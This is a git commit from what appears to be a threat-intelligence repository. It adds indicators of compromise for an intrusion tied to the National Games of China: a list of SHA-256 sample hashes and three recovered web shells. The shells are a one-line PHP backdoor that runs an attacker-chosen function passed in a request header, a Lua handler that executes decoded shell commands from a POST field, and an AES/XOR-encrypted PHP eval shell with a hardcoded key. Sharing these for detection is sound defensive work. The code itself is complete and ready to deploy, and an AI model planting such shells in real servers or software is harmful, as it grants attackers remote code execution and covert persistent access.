National Games of China

2022-02-03 13:58:59 +01:00 · 2022-02-03 13:58:59 +01:00 · 477a48f73d
parent 3657eda5b8
commit 477a48f73d
6 changed files with 87 additions and 0 deletions
--- a/CoViper/extras/fe22dd2588666974cae5b5bbde2d763afbd94bccf72d350ec4e801f9354d103d
+++ b/CoViper/extras/fe22dd2588666974cae5b5bbde2d763afbd94bccf72d350ec4e801f9354d103d
--- a/NationalGamesOfChina/README.md
+++ b/NationalGamesOfChina/README.md
@ -0,0 +1,26 @@
+# IoC for National Games of China incident
+
+### Table of Contents
+* [IoCs](#IoCs)
+* [Source Code](#event-names)
+
+## Samples (SHA-256)
+#### National Games of China incident related files
+```
+0C6AE9DE10BEE6568EC3AD24918C829B7E5132CC0DD1665D4BBF1C3FE84451B6
+0D1504A9AE319BDC320F938D2CDF72CBA18277B3F2B311ABF0BACAD2517DABC0
+CAC30CC2F4646979D0BE8B4D5F3A1F87351B3BB77F22E5064BD034CEC9E119BB
+0AEB963B4566DC2224D34B4885336C666198DB2AC64C810586CE3B17EF3DA59F
+DFFA7E31797339F3CE7EC453161B60010EDA3DD2E52AA9F147AB4389672C3536
+BDD4D0BB36D07AE6B97FFBCD386C54E1B15FEFE65329FF0389DFD5739CD3CFF2
+3A8DC7E730A1F82F65F1731CB31E05E2F749A9E89AB8529168A082D24680D2DD
+EC8AEF085D3CC57A4E92A613E128F2D9C7B5F03B8E017DD80D89BFEADA228639
+2CAB3B0391BF3ACE689FC697F522B3C86411E059AB8C1F4F5B7357B484B93035
+D033756A57D8A2758DE40895849E2146D571B3B44F3089EB68C31483784586CD
+```
+## Source Code files
+```
+admin2.php
+conf.lua
+miss1.php
+```
--- a/NationalGamesOfChina/admin2.php
+++ b/NationalGamesOfChina/admin2.php
@ -0,0 +1 @@
+<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0]($x[1]);?>
--- a/NationalGamesOfChina/conf.lua
+++ b/NationalGamesOfChina/conf.lua
@ -0,0 +1,24 @@
+package.path = package.path .. ';../app/lua/?.lua;./app/lua/?.lua'
+web = require "libs/webutils"
+
+
+local handler = {}
+
+function handler.cc(self, action)
+  local a = io.popen(mg.base64_decode(mg.base64_decode(web:post("username")))):read("*all")
+  --print(a)
+  web:plain(mg.base64_encode(mg.base64_encode(a)))
+end
+
+
+
+--- The main loop
+local a = web:get("a")
+if handler[a] then
+  local result, err = pcall(handler[a], heandler, a)
+  if result == false then
+    web:json(json.encode({cmd='error', op='error', code=500, result=result, errmsg=err}))
+  end
+else
+  web:html("hello test!");
+end
--- a/NationalGamesOfChina/miss1.php
+++ b/NationalGamesOfChina/miss1.php
@ -0,0 +1,26 @@
+<?php
+@error_reporting(0);
+session_start();
+    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond
+	$_SESSION['k']=$key;
+	session_write_close();
+	$post=file_get_contents("php://input");
+	if(!extension_loaded('openssl'))
+	{
+		$t="base64_"."decode";
+		$post=$t($post."");
+		
+		for($i=0;$i<strlen($post);$i++) {
+    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
+    			}
+	}
+	else
+	{
+		$post=openssl_decrypt($post, "AES128", $key);
+	}
+    $arr=explode('|',$post);
+    $func=$arr[0];
+    $params=$arr[1];
+	class C{public function __invoke($p) {eval($p."");}}
+    @call_user_func(new C(),$params);
+?>
--- a/NationalGamesOfChina/samples.sha256
+++ b/NationalGamesOfChina/samples.sha256
@ -0,0 +1,10 @@
+0C6AE9DE10BEE6568EC3AD24918C829B7E5132CC0DD1665D4BBF1C3FE84451B6
+0D1504A9AE319BDC320F938D2CDF72CBA18277B3F2B311ABF0BACAD2517DABC0
+CAC30CC2F4646979D0BE8B4D5F3A1F87351B3BB77F22E5064BD034CEC9E119BB
+0AEB963B4566DC2224D34B4885336C666198DB2AC64C810586CE3B17EF3DA59F
+DFFA7E31797339F3CE7EC453161B60010EDA3DD2E52AA9F147AB4389672C3536
+BDD4D0BB36D07AE6B97FFBCD386C54E1B15FEFE65329FF0389DFD5739CD3CFF2
+3A8DC7E730A1F82F65F1731CB31E05E2F749A9E89AB8529168A082D24680D2DD
+EC8AEF085D3CC57A4E92A613E128F2D9C7B5F03B8E017DD80D89BFEADA228639
+2CAB3B0391BF3ACE689FC697F522B3C86411E059AB8C1F4F5B7357B484B93035
+D033756A57D8A2758DE40895849E2146D571B3B44F3089EB68C31483784586CD
				`@ -0,0 +1 @@`
				`<?=$x=explode('~',base64_decode(substr(getallheaders()['x'],1)));@$x[0]($x[1]);?>`